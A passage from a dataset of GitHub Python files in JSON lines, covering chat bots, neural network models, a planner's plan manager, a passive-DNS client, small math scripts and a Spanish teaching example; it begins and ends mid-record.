user_data.filter(client_name=name[0])\n\n all_clients[data_sets[0]] = grand_total(data_sets)\n # passing the final list of query set to the frontend\n return all_clients\n else:\n entries = user_data.filter(client_name=client).distinct()\n all_clients = {}\n for entry in entries:\n data_sets = user_data.filter(client_name=client)\n all_clients[data_sets[0]] = grand_total(data_sets)\n # passing the final list of query set to the frontend\n return all_clients\n","repo_name":"HussainAzad01/khata_book","sub_path":"khata_book/khata_app/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14444193691","text":"# bot.py\nimport os\nimport random\nimport discord\nfrom dotenv import load_dotenv\nfrom search import google_search\nfrom dataBase import get_search_data, post_search_data\nload_dotenv()\n#TOKEN = os.getenv('DISCORD_TOKEN')\nTOKEN = {'DISCORD_TOKEN'}\nGUILD = {'SERVER_NAME'}\n\nclient = discord.Client()\n\n@client.event\nasync def on_ready():\n print(f'{client.user.name} has connected to Discord!')\n\n@client.event\nasync def on_message(message):\n user_id = message.author.id\n msg = message.content.lower()\n if message.author == client.user:\n return\n\n if msg.startswith('hi'):\n response = 'Hey'\n await message.channel.send(response)\n\n if msg.startswith('!google'):\n msg = msg.split(None, 1)[1]\n post_search_data(user_id, msg)\n response = google_search(msg, user_id)\n if response:\n response = 'Result of search: {}'.format(response)\n\n else:\n response = 'Your search - {} - did not match any documents.'.format(msg)\n await message.channel.send(response)\n\n if msg.startswith('!recent'):\n msg = msg.split(None, 1)[1]\n response = get_search_data(user_id,msg)\n if response:\n response = 'Result of search: {}' .format(response)\n\n else:\n response = 'Your search - {} - did not match any documents.'.format(msg)\n await message.channel.send(response)\n\nclient.run(TOKEN)\n\n","repo_name":"ree12345/DiscordBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12618910402","text":"# !/usr/bin/env python\r\nfrom NeuralLanguageModel import NeuralLanguageModel\r\n# encoding: utf-8\r\n\r\nimport os, sys\r\n\r\nsys.path.append(os.getcwd())\r\n\r\nfrom nn_layer import softmax_layer, bi_dynamic_rnn, reduce_mean_with_len\r\nfrom att_layer import bilinear_attention_layer, dot_produce_attention_layer\r\nfrom config import *\r\nfrom utils import load_w2v, batch_index, load_inputs_twitter\r\nimport numpy as np\r\n\r\ntf.set_random_seed(1)\r\n\r\n'''\r\nCode Code is based on and originally written by Maria Mihaela Trusca (https://github.com/mtrusca/HAABSA_PLUS_PLUS).\r\nAdapted by Kunal Geed\r\n'''\r\nclass LCRRotHopModel(NeuralLanguageModel):\r\n\r\n def lcr_rot(self, input_fw, input_bw, sen_len_fw, sen_len_bw, target, sen_len_tr, keep_prob1, keep_prob2, l2,\r\n _id='all'):\r\n print('I am lcr_rot_altv4_inherited.')\r\n rate=1-keep_prob1\r\n cell = tf.contrib.rnn.LSTMCell\r\n input_fw_orignial = input_fw\r\n input_bw_original = input_bw\r\n # left hidden\r\n input_fw = tf.nn.dropout(input_fw, rate=rate)\r\n hiddens_l = bi_dynamic_rnn(cell, input_fw, FLAGS.n_hidden, sen_len_fw, FLAGS.max_sentence_len, 'l' + _id,\r\n 'all') # Hidden State Left, size = number of left words\r\n pool_l = reduce_mean_with_len(hiddens_l, sen_len_fw)\r\n\r\n # right hidden\r\n input_bw = tf.nn.dropout(input_bw, rate=rate)\r\n hiddens_r = bi_dynamic_rnn(cell, input_bw, FLAGS.n_hidden, sen_len_bw, FLAGS.max_sentence_len, 'r' + _id,\r\n 'all') # Hideen State Right (H_r) size=number of right words\r\n pool_r = reduce_mean_with_len(hiddens_r, sen_len_bw)\r\n\r\n # target hidden\r\n target = tf.nn.dropout(target, rate=rate)\r\n hiddens_t = bi_dynamic_rnn(cell, target, FLAGS.n_hidden, sen_len_tr, FLAGS.max_sentence_len, 't' + _id,\r\n 'all') # Hidden State Target (H_t) size= number of target words\r\n pool_t = reduce_mean_with_len(hiddens_t, sen_len_tr)\r\n\r\n # attention left\r\n att_l = bilinear_attention_layer(hiddens_l, pool_t, sen_len_fw, 2 * FLAGS.n_hidden, l2, FLAGS.random_base,\r\n 'tl') # Attention Score left, size = 1 x number of left words\r\n weighted_hidden_states_left = tf.multiply(tf.transpose(att_l, perm=[0, 2, 1]),\r\n hiddens_l) # multiplied by the first attention score\r\n\r\n outputs_t_l_init = tf.matmul(att_l, hiddens_l)\r\n outputs_t_l = tf.squeeze(outputs_t_l_init)\r\n # attention right\r\n att_r = bilinear_attention_layer(hiddens_r, pool_t, sen_len_bw, 2 * FLAGS.n_hidden, l2, FLAGS.random_base,\r\n 'tr') # Attention Score right size= 1 x number of right words\r\n weighted_hidden_states_right = tf.multiply(tf.transpose(att_r, perm=[0, 2, 1]),\r\n hiddens_r) # multiplied by the first attention score at word level (not summed)\r\n\r\n outputs_t_r_init = tf.matmul(att_r, hiddens_r)\r\n outputs_t_r = tf.squeeze(outputs_t_r_init)\r\n\r\n # attention target left\r\n att_t_l = bilinear_attention_layer(hiddens_t, outputs_t_l, sen_len_tr, 2 * FLAGS.n_hidden, l2,\r\n FLAGS.random_base,\r\n 'l') # Attention Score target left, size= 1 x number of target words.\r\n outputs_l_init = tf.matmul(att_t_l, hiddens_t)\r\n outputs_l = tf.squeeze(outputs_l_init)\r\n # attention target right\r\n att_t_r = bilinear_attention_layer(hiddens_t, outputs_t_r, sen_len_tr, 2 * FLAGS.n_hidden, l2,\r\n FLAGS.random_base,\r\n 'r') # Attention Score target right size= 1 x number of target words.\r\n outputs_r_init = tf.matmul(att_t_r, hiddens_t) # The hidden state times the attention score\r\n outputs_r = tf.squeeze(outputs_r_init)\r\n\r\n outputs_init_context = tf.concat([outputs_t_l_init, outputs_t_r_init], 1)\r\n outputs_init_target = tf.concat([outputs_l_init, outputs_r_init], 1)\r\n att_outputs_context = dot_produce_attention_layer(outputs_init_context, None, 2 * FLAGS.n_hidden, l2,\r\n FLAGS.random_base, 'fin1') # alpha context\r\n att_outputs_target = dot_produce_attention_layer(outputs_init_target, None, 2 * FLAGS.n_hidden, l2,\r\n FLAGS.random_base, 'fin2') # alpha target\r\n outputs_l = tf.squeeze(tf.matmul(tf.expand_dims(att_outputs_target[:, :, 0], 2), outputs_l_init))\r\n outputs_r = tf.squeeze(tf.matmul(tf.expand_dims(att_outputs_target[:, :, 1], 2), outputs_r_init))\r\n outputs_t_l = tf.squeeze(tf.matmul(tf.expand_dims(att_outputs_context[:, :, 0], 2), outputs_t_l_init))\r\n outputs_t_r = tf.squeeze(tf.matmul(tf.expand_dims(att_outputs_context[:, :, 1], 2), outputs_t_r_init))\r\n\r\n hierarchical_weighted_states_left = tf.multiply(tf.expand_dims(att_outputs_context[:, :, 0], 2),\r\n weighted_hidden_states_left)\r\n hierarchical_weighted_states_right = tf.multiply(tf.expand_dims(att_outputs_context[:, :, 1], 2),\r\n weighted_hidden_states_right)\r\n layer_information = {\r\n 'embedding_left': input_fw_orignial,\r\n 'embedding_right': input_bw_original,\r\n 'left_hidden_state': hiddens_l,\r\n 'right_hidden_state': hiddens_r,\r\n 'weighted_states_left_initial': hierarchical_weighted_states_left,\r\n 'weighted_states_right_initial': hierarchical_weighted_states_right\r\n }\r\n\r\n for i in range(2):\r\n # attention target\r\n att_l = bilinear_attention_layer(hiddens_l, outputs_l, sen_len_fw, 2 * FLAGS.n_hidden, l2,\r\n FLAGS.random_base, 'tl' + str(i))\r\n outputs_t_l_init = tf.matmul(att_l, hiddens_l)\r\n outputs_t_l = tf.squeeze(outputs_t_l_init)\r\n\r\n att_r = bilinear_attention_layer(hiddens_r, outputs_r, sen_len_bw, 2 * FLAGS.n_hidden, l2,\r\n FLAGS.random_base, 'tr' + str(i))\r\n outputs_t_r_init = tf.matmul(att_r, hiddens_r)\r\n outputs_t_r = tf.squeeze(outputs_t_r_init)\r\n\r\n # attention left\r\n att_t_l = bilinear_attention_layer(hiddens_t, outputs_t_l, sen_len_tr, 2 * FLAGS.n_hidden, l2,\r\n FLAGS.random_base, 'l' + str(i))\r\n outputs_l_init = tf.matmul(att_t_l, hiddens_t)\r\n outputs_l = tf.squeeze(outputs_l_init)\r\n weighted_hidden_states_left = tf.multiply(tf.transpose(att_l, perm=[0, 2, 1]),\r\n hiddens_l) # multiplied by the first attention score\r\n\r\n # attention right\r\n att_t_r = bilinear_attention_layer(hiddens_t, outputs_t_r, sen_len_tr, 2 * FLAGS.n_hidden, l2,\r\n FLAGS.random_base, 'r' + str(i))\r\n outputs_r_init = tf.matmul(att_t_r, hiddens_t)\r\n outputs_r = tf.squeeze(outputs_r_init)\r\n weighted_hidden_states_right = tf.multiply(tf.transpose(att_r, perm=[0, 2, 1]),\r\n hiddens_r) # multiplied by the first attention score at word level (not summed)\r\n\r\n outputs_init_context = tf.concat([outputs_t_l_init, outputs_t_r_init], 1)\r\n outputs_init_target = tf.concat([outputs_l_init, outputs_r_init], 1)\r\n att_outputs_context = dot_produce_attention_layer(outputs_init_context, None, 2 * FLAGS.n_hidden, l2,\r\n FLAGS.random_base, 'fin1' + str(i)) # alpha for target\r\n att_outputs_target = dot_produce_attention_layer(outputs_init_target, None, 2 * FLAGS.n_hidden, l2,\r\n FLAGS.random_base, 'fin2' + str(i)) # alpha for context\r\n outputs_l = tf.squeeze(tf.matmul(tf.expand_dims(att_outputs_target[:, :, 0], 2), outputs_l_init))\r\n outputs_r = tf.squeeze(tf.matmul(tf.expand_dims(att_outputs_target[:, :, 1], 2), outputs_r_init))\r\n outputs_t_l = tf.squeeze(tf.matmul(tf.expand_dims(att_outputs_context[:, :, 0], 2), outputs_t_l_init))\r\n outputs_t_r = tf.squeeze(tf.matmul(tf.expand_dims(att_outputs_context[:, :, 1], 2), outputs_t_r_init))\r\n hierarchical_weighted_states_left = tf.multiply(tf.expand_dims(att_outputs_context[:, :, 0], 2),\r\n weighted_hidden_states_left)\r\n hierarchical_weighted_states_right = tf.multiply(tf.expand_dims(att_outputs_context[:, :, 1], 2),\r\n weighted_hidden_states_right)\r\n layer_information['weighted_states_left_' + str(i)] = hierarchical_weighted_states_left\r\n layer_information['weighted_states_right_' + str(i)] = hierarchical_weighted_states_right\r\n\r\n outputs_fin = tf.concat([outputs_l, outputs_r, outputs_t_l, outputs_t_r], 1)\r\n prob = softmax_layer(outputs_fin, 8 * FLAGS.n_hidden, FLAGS.random_base, keep_prob2, l2, FLAGS.n_class)\r\n return prob, att_l, att_r, att_t_l, att_t_r, layer_information\r\n","repo_name":"KunalGeed/DC-LCR-Rot-hop_plus_plus","sub_path":"lcr_v4.py","file_name":"lcr_v4.py","file_ext":"py","file_size_in_byte":9580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74898045687","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 24 09:59:14 2015\n\n@author: usuario\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef inversion(x, y):\n z = [s+t*1.0J for s,t in zip(x,y)]\n zp = [4.0/s.conjugate() for s in z if s != 0]\n xp = [s.real for s in zp]\n yp = [s.imag for s in zp]\n return xp, yp\n \n\nM = np.random.random((3,3))\nM[:,[0,1]] = 10*M[:, [0,1]] - 5\nM[:, 2] = 10*M[:,2]\n\ntheta = np.linspace(0,2*np.pi, 50)\n\nfor i in range(3):\n x0, y0, r = M[i,:]\n x = r*np.cos(theta) + x0\n y = r*np.sin(theta) + y0\n xp, yp = inversion(x, y)\n plt.plot(x, y, xp, yp, '*')\n \n","repo_name":"ixxra/introduction-to-programming","sub_path":"src/ej-inversion.py","file_name":"ej-inversion.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"27649680872","text":"import random\nfrom datetime import datetime, timedelta\n\nfrom pytz import timezone\nfrom aiogram import types\nfrom dispatcher import dp, bot\nfrom bot import db_bot\nfrom config import TIMEZONE\n\n\n@dp.message_handler(commands=['start'])\nasync def cmd_start(message: types.Message):\n chat = message.chat\n if chat.type in [types.ChatType.GROUP, types.ChatType.SUPERGROUP]:\n if not await db_bot.check_chat_id(chat.id):\n message = (\n \"Thanks for adding me to the group!\\n\"\n \"I'm a bot that randomly adds (or subtracts) the score every day.\")\n await bot.send_message(chat.id, message)\n await db_bot.insert_chat_id(chat.id)\n else:\n me = await bot.me\n await message.answer(f'Add me to the group and write a command /start@{me.username}')\n\n\n@dp.message_handler(commands=['score'])\nasync def cmd_score(message: types.Message):\n chat_id = message.chat.id\n user_id = message.from_user.id\n\n if not await db_bot.check_chat_id(chat_id):\n await message.answer(\"Add me to a group or use a command /start@{me.username}\")\n return\n\n mention = f'{message.from_user.full_name}'\n user = list(await db_bot.get_user_info(chat_id, user_id))\n tz = timezone(TIMEZONE)\n date = (datetime.now(tz) + timedelta(hours=3)).date()\n message_text = \"\"\n\n if user and user[1] == date:\n message_text += f'{mention}, you played today!\\n'\n else:\n new_points = random.randint(-5, 10)\n if user:\n user[0] += new_points\n user[1] = date\n await db_bot.update_user_info(chat_id, user_id, *user)\n else:\n user = [new_points, date]\n await db_bot.insert_user_info(chat_id, user_id, *user)\n\n if new_points >= 0:\n message_text += f'{mention}, you get {new_points} score!\\n'\n elif new_points < 0:\n message_text += f'{mention}, you loose {-new_points} score!\\n'\n\n message_text += f\"You have {user[0]} score.\"\n await message.answer(message_text)\n\n\nasync def top(chat_id, anti=False):\n top_users = await db_bot.get_sort_user_info(chat_id, anti)\n message_text = f'top 10 players{\" from end\" if anti else \"\"}:\\n'\n for i, (user_id, points) in enumerate(top_users):\n user = await bot.get_chat_member(chat_id, user_id)\n message_text += f'{i + 1}. {user.user.full_name[:10]}{points} points\\n'\n return message_text\n\n\n@dp.message_handler(commands=['top'])\nasync def cmd_top(message: types.Message):\n chat_id = message.chat.id\n\n if not await db_bot.check_chat_id(chat_id):\n await message.answer(\"Add me to a group or use a command /start@{me.username}\")\n return\n\n await message.answer(await top(chat_id, anti=False))\n\n\n@dp.message_handler(commands=['antitop'])\nasync def cmd_antitop(message: types.Message):\n chat_id = message.chat.id\n\n if not await db_bot.check_chat_id(chat_id):\n await message.answer(\"Add me to a group or use a command /start@{me.username}\")\n return\n\n await message.answer(await top(chat_id, anti=True))\n\n\n@dp.message_handler(commands=['help'])\nasync def cmd_help(message: types.Message):\n message_text = (\n 'Commands:\\n'\n '/score - Add randomly to score from -5 to 10. Can be used once a day.\\n'\n '/top - Show top 10 players.\\n'\n '/help - Commands.'\n )\n await message.answer(message_text)","repo_name":"dugd/randomscorebot","sub_path":"handlers/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":3546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28446907990","text":"\n\n\n\n\n\n#%%\nnormalized=False\ny_plus=15\ntarget=['pr0.71_flux']\nvar=['u_vel',\"pr0.71\"]\n\n\ndef slice_loc(y_plus,var,target,normalized):\n \"\"\"where to save the slices\n\n Args:\n y_plus (int): y_plus value of slice\n var (list): list of variables\n target (list): list of targets\n normalized (bool): if the data is normalized or not\n\n Returns:\n str: string of file save location\n \"\"\"\n import os\n\n var_sort=sorted(var)\n var_string=\"_\".join(var_sort)\n target_sort=sorted(target)\n target_string=\"_\".join(target_sort)\n\n if normalized==True:\n slice_loc=os.path.join(\"/home/au643300/DataHandling/data/processed\",'y_plus_'+str(y_plus)+\"_VARS-\"+var_string+\"_TARGETS-\"+target_string+\"_normalized\")\n else:\n slice_loc=os.path.join(\"/home/au643300/DataHandling/data/processed\",'y_plus_'+str(y_plus)+\"-VARS-\"+var_string+\"-TARGETS-\"+target_string)\n\n return slice_loc\n\nslice_loc(y_plus,var,target,normalized)\n\n\n\n# %%\n","repo_name":"dragethor/DataHandling","sub_path":"notebooks/Refractored/26-11-21_new_folder_struct.py","file_name":"26-11-21_new_folder_struct.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"4985352138","text":"from keras.models import Model\nfrom keras.layers import Conv2D, MaxPooling2D, Conv2DTranspose, Cropping2D, Activation, Add, Input\n\n\nclass FCN8(Model):\n def __init__(self, n_classes):\n super(FCN8, self).__init__(name='FCN-8')\n\n # Encoder\n self.conv1a = Conv2D(filters=64, kernel_size=(3, 3), strides=1, padding='same', activation='relu')\n self.conv1b = Conv2D(filters=64, kernel_size=(3, 3), strides=1, padding='same', activation='relu')\n self.max_pool1 = MaxPooling2D(pool_size=(2, 2), strides=2)\n\n self.conv2a = Conv2D(filters=128, kernel_size=(3, 3), strides=1, padding='same', activation='relu')\n self.conv2b = Conv2D(filters=128, kernel_size=(3, 3), strides=1, padding='same', activation='relu')\n self.max_pool2 = MaxPooling2D(pool_size=(2, 2), strides=2)\n\n self.conv3a = Conv2D(filters=256, kernel_size=(3, 3), strides=1, padding='same', activation='relu')\n self.conv3b = Conv2D(filters=256, kernel_size=(3, 3), strides=1, padding='same', activation='relu')\n self.conv3c = Conv2D(filters=256, kernel_size=(3, 3), strides=1, padding='same', activation='relu')\n self.max_pool3 = MaxPooling2D(pool_size=(2, 2), strides=2)\n\n self.conv4a = Conv2D(filters=512, kernel_size=(3, 3), strides=1, padding='same', activation='relu')\n self.conv4b = Conv2D(filters=512, kernel_size=(3, 3), strides=1, padding='same', activation='relu')\n self.conv4c = Conv2D(filters=512, kernel_size=(3, 3), strides=1, padding='same', activation='relu')\n self.max_pool4 = MaxPooling2D(pool_size=(2, 2), strides=2)\n\n self.conv5a = Conv2D(filters=512, kernel_size=(3, 3), strides=1, padding='same', activation='relu')\n self.conv5b = Conv2D(filters=512, kernel_size=(3, 3), strides=1, padding='same', activation='relu')\n self.conv5c = Conv2D(filters=512, kernel_size=(3, 3), strides=1, padding='same', activation='relu')\n self.max_pool5 = MaxPooling2D(pool_size=(2, 2), strides=2)\n\n self.extra1 = Conv2D(filters=4096, kernel_size=(7, 7), activation=\"relu\", padding=\"same\", name=\"conv6\")\n self.extra2 = Conv2D(filters=4096, kernel_size=(1, 1), activation=\"relu\", padding=\"same\", name=\"conv7\")\n\n # Decoder\n # path 1.1\n self.convT1 = Conv2DTranspose(filters=n_classes, kernel_size=(4, 4), strides=2, use_bias=False)\n self.cropT1 = Cropping2D(cropping=(1, 1))\n\n # path 1.2\n self.conv1d1 = Conv2D(filters=n_classes, kernel_size=(1, 1), padding='same', activation='relu')\n\n # ADD-1\n self.add1 = Add()\n\n # path 2.1\n self.convT2 = Conv2DTranspose(filters=n_classes, kernel_size=(4, 4), strides=2, use_bias=False)\n self.cropT2 = Cropping2D(cropping=(1, 1))\n\n # path 2.2\n self.conv1d2 = Conv2D(filters=n_classes, kernel_size=(1, 1), padding='same', activation='relu')\n\n # ADD-2\n self.add2 = Add()\n\n # output\n self.convT3 = Conv2DTranspose(filters=n_classes, kernel_size=(8, 8), strides=8, use_bias=False)\n self.softmax = Activation(\"softmax\")\n\n self.output_layer = Conv2D(filters=3, kernel_size=1, strides=1, activation='sigmoid', padding='same', name=\"OutputLayer\")\n\n def call(self, inputs):\n # Encoder #\n # Block 1\n x = self.conv1a(inputs)\n x = self.conv1b(x)\n x = self.max_pool1(x)\n\n # Block 2\n x = self.conv2a(x)\n x = self.conv2b(x)\n x = self.max_pool2(x)\n\n # Block 3\n x = self.conv3a(x)\n x = self.conv3b(x)\n x = self.conv3c(x)\n x = self.max_pool3(x)\n pool3 = x\n\n # Block 4\n x = self.conv4a(x)\n x = self.conv4b(x)\n x = self.conv4c(x)\n x = self.max_pool4(x)\n pool4 = x\n\n # Block 5\n x = self.conv5a(x)\n x = self.conv5b(x)\n x = self.conv5c(x)\n x = self.max_pool5(x)\n\n x = self.extra1(x)\n x = self.extra2(x)\n\n pool5 = x\n\n # Decoder #\n # Path 1.1\n path11 = self.convT1(pool5)\n path11 = self.cropT1(path11)\n\n # Path 1.2\n path12 = self.conv1d1(pool4)\n\n # Path 2.1 = path1.1 + path1.2\n path21 = self.add1([path11, path12])\n path21 = self.convT2(path21)\n path21 = self.cropT2(path21)\n\n # path 2.2\n path22 = self.conv1d2(pool3)\n\n # Add\n add = self.add2([path21, path22])\n\n # output\n output = self.convT3(add)\n output = self.output_layer(output)\n\n return output\n","repo_name":"hossamasaad/Semantic-Segmantation","sub_path":"models/FCN.py","file_name":"FCN.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"19495693578","text":"import itertools\nimport os\nimport os.path\nimport re\n\nfrom . import returncodes\n\n\n_PLAN_INFO_REGEX = re.compile(r\"; cost = (\\d+) \\((unit cost|general cost)\\)\\n\")\n\n\ndef _read_last_line(filename):\n line = None\n with open(filename) as input_file:\n for line in input_file:\n pass\n return line\n\n\ndef _parse_plan(plan_filename):\n \"\"\"Parse a plan file and return a pair (cost, problem_type)\n summarizing the salient information. Return (None, None) for\n incomplete plans.\"\"\"\n\n last_line = _read_last_line(plan_filename) or \"\"\n match = _PLAN_INFO_REGEX.match(last_line)\n if match:\n return int(match.group(1)), match.group(2)\n else:\n return None, None\n\n\nclass PlanManager:\n def __init__(self, plan_prefix, portfolio_bound=None, single_plan=False):\n self._plan_prefix = plan_prefix\n self._plan_costs = []\n self._problem_type = None\n if portfolio_bound is None:\n portfolio_bound = \"infinity\"\n self._portfolio_bound = portfolio_bound\n self._single_plan = single_plan\n\n def get_plan_prefix(self):\n return self._plan_prefix\n\n def get_plan_counter(self):\n return len(self._plan_costs)\n\n def get_next_portfolio_cost_bound(self):\n \"\"\"Return the next plan cost bound to be used in a portfolio planner.\n\n Initially, this is the user-specified cost bound, or \"infinity\"\n if the user specified no bound. Once a plan has been found, it\n is the cost of the best plan found so far. (This is always the\n last plan found because plans must decrease in cost.)\n \"\"\"\n if self._plan_costs:\n return self._plan_costs[-1]\n else:\n return self._portfolio_bound\n\n def abort_portfolio_after_first_plan(self):\n return self._single_plan\n\n def get_problem_type(self):\n if self._problem_type is None:\n returncodes.exit_with_driver_critical_error(\"no plans found yet: cost type not set\")\n return self._problem_type\n\n def process_new_plans(self):\n \"\"\"Update information about plans after a planner run.\n\n Read newly generated plans and store the relevant information.\n If the last plan file is incomplete, delete it.\n \"\"\"\n\n had_incomplete_plan = False\n for counter in itertools.count(self.get_plan_counter() + 1):\n plan_filename = self._get_plan_file(counter)\n def bogus_plan(msg):\n returncodes.exit_with_driver_critical_error(\"%s: %s\" % (plan_filename, msg))\n if not os.path.exists(plan_filename):\n break\n if had_incomplete_plan:\n bogus_plan(\"plan found after incomplete plan\")\n cost, problem_type = _parse_plan(plan_filename)\n if cost is None:\n had_incomplete_plan = True\n print(\"%s is incomplete. Deleted the file.\" % plan_filename)\n os.remove(plan_filename)\n else:\n print(\"plan manager: found new plan with cost %d\" % cost)\n if self._problem_type is None:\n # This is the first plan we found.\n self._problem_type = problem_type\n else:\n # Check if info from this plan matches previous info.\n if self._problem_type != problem_type:\n bogus_plan(\"problem type has changed\")\n if cost >= self._plan_costs[-1]:\n bogus_plan(\"plan quality has not improved\")\n self._plan_costs.append(cost)\n\n def get_existing_plans(self):\n \"\"\"Yield all plans that match the given plan prefix.\"\"\"\n if os.path.exists(self._plan_prefix):\n yield self._plan_prefix\n\n for counter in itertools.count(start=1):\n plan_filename = self._get_plan_file(counter)\n if os.path.exists(plan_filename):\n yield plan_filename\n else:\n break\n\n def delete_existing_plans(self):\n \"\"\"Delete all plans that match the given plan prefix.\"\"\"\n for plan in self.get_existing_plans():\n os.remove(plan)\n\n def _get_plan_file(self, number):\n return \"%s.%d\" % (self._plan_prefix, number)\n","repo_name":"aibasel/downward","sub_path":"driver/plan_manager.py","file_name":"plan_manager.py","file_ext":"py","file_size_in_byte":4288,"program_lang":"python","lang":"en","doc_type":"code","stars":173,"dataset":"github-code","pt":"77"} +{"seq_id":"16912169232","text":"#!/bin/python\n# -*- coding: utf-8 -*-\n\nimport datetime\nimport json\nimport requests\ntry:\n import requests_cache\n HAS_CACHE = True\nexcept ImportError:\n HAS_CACHE = False\nimport logging\nlogger = logging\n\nsort_choice = ['count', 'rdata', 'rrname', 'rrtype', 'time_first', 'time_last']\n\n\nclass PyPDNS(object):\n\n def __init__(self, url='https://www.circl.lu/pdns/query', basic_auth=None,\n auth_token=None, enable_cache=False, cache_expire_after=604800, cache_file='/tmp/pdns.cache'):\n self.url = url\n if enable_cache and not HAS_CACHE:\n raise Exception('Please install requests_cache if you want to use the caching capabilities.')\n self.enable_cache = enable_cache\n\n if enable_cache is True:\n requests_cache.install_cache(cache_file, backend='sqlite', expire_after=cache_expire_after)\n self.session = requests_cache.CachedSession()\n else:\n self.session = requests.Session()\n if basic_auth is not None:\n # basic_auth has do be a tuple ('user_name', 'password')\n self.session.auth = basic_auth\n elif auth_token is not None:\n self.session.headers.update({'Authorization': auth_token})\n else:\n # No authentication defined.\n pass\n\n def query(self, q, sort_by='time_last'):\n logger.info(\"start query() q=[%s]\", q)\n if sort_by not in sort_choice:\n raise Exception('You can only sort by ' + ', '.join(sort_choice))\n response = self.session.get('{}/{}' .format(self.url, q))\n if response.status_code != 200:\n raise Exception('HTTP error authentication incorrect?')\n to_return = []\n for l in response.text.split('\\n'):\n if len(l) == 0:\n continue\n try:\n if self.enable_cache is True and response.from_cache is True:\n logger.info(\"from cache query() q=[%s]\", q)\n obj = json.loads(l)\n except:\n logger.exception(\"except query() q=[%s]\", q)\n raise Exception('Unable to decode JSON object: ' + l)\n obj['time_first'] = datetime.datetime.fromtimestamp(obj['time_first'])\n obj['time_last'] = datetime.datetime.fromtimestamp(obj['time_last'])\n to_return.append(obj)\n to_return = sorted(to_return, key=lambda k: k[sort_by])\n return to_return\n","repo_name":"amir17688/google_data_p1","sub_path":"32920_api.py_C__Users_user_Desktop_data_2_data_google_data_CIRCL_PyPDNS_pypdns.py","file_name":"32920_api.py_C__Users_user_Desktop_data_2_data_google_data_CIRCL_PyPDNS_pypdns.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73577870327","text":"# import the module and init pygame\nimport pygame\npygame.init()\n\nscreen = pygame.display.set_mode([500, 500])\nrunning = True\n\n\"\"\"\nThe Camera variables are used to keep track of where the user currently\nis in space.\n\"\"\"\nglobal camera_x; camera_x = 0\nglobal camera_y; camera_y = 0\nglobal camera_z; camera_z = 0\nglobal camera_vertical_angle; camera_vertical_angle = 90\nglobal camera_horizontal_angle; camera_horizontal_angle = 90\n\nif __name__ == \"__main__\":\n\twhile running:\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\trunning = False\n\n\t\tscreen.fill((255, 255, 255))\n\t\t\n\t\t\"\"\"\tDO DRAWING AND RENDERING HERE\t\"\"\"\n\n\t\tpygame.display.flip()\n\n\t\n\tpygame.quit()\n","repo_name":"jweir136/PyGame-Tutorial-1","sub_path":"PyGame-1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6632396028","text":"#!/usr/bin/env python\n\nfrom sys import argv\nfrom statistics import median, mean\nfrom math import floor\n\ndef my_initial_2nd_part(lst):\n med = median(lst)\n mem = -1\n xx = 0\n for x in range(1000):\n z = 0\n y = 0\n for elem in lst:\n tmp1 = abs(elem - med - x)\n tmp2 = abs(elem - med + x)\n z += tmp1 * (tmp1 + 1) / 2\n y += tmp2 * (tmp2 + 1) / 2\n if mem == -1 or min(mem, z) == z:\n mem = z\n xx = med + x\n if min(mem, y) == y:\n mem = y\n xx = med - x\n print(int(mem), end = ' ')\n print(int(xx))\n\n\nlst = [*map(int, open(argv[1]).readline().split(','))]\nx = median(lst)\nx1 = floor(mean(lst))\nx2 = x1 + 1\nz = z1 = z2 = 0\nfor elem in lst:\n z += abs(elem - x)\n z1 += abs(x1 - elem) * (abs(x1 - elem) + 1) // 2\n z2 += abs(x2 - elem) * (abs(x2 - elem) + 1) // 2\nprint(int(z))\nprint(int(min(z1, z2)))","repo_name":"AugustinLopez/42AI_Piscine_Python","sub_path":"AOC2021/d07/d07.py","file_name":"d07.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11806188772","text":"# coding=utf-8\nimport sys\n\ndef calculate(first_number, second_number, es_una_suma):\n result = 0\n if(es_una_suma == \"suma\"):\n result = int(first_number) + int(second_number)\n else:\n result = int(first_number) - int(second_number)\n return result\n\ndef sum_and_multiplicate_or_not(first_number, second_number, es_una_multiplicacion):\n result = calculate(first_number, second_number, \"suma\")\n if(es_una_multiplicacion == \"multiplicacion\"):\n if(result > 300):\n result = result*2\n else:\n result = result/2\n print(\"Mi resultado final es \" + str(result))\n else:\n print(\"No hago nada a pedido tuyo\")\n\nsum_and_multiplicate_or_not(sys.argv[1], sys.argv[2], sys.argv[3])\n\n''' Empieza a ponerse picante la cosa. Nuevas consideraciones: funciones que retornan parámetros, condicionales anidados.\nBasicamente, dividimos nuestras responsabilidades en dos funciones. Y así podríamos hacerlo más veces, de ser necesario: una función que sume, una que multiplique,\notra que imprima en pantalla, una más que nos diga el mensaje que queremos imprimir. Las posibilidades son 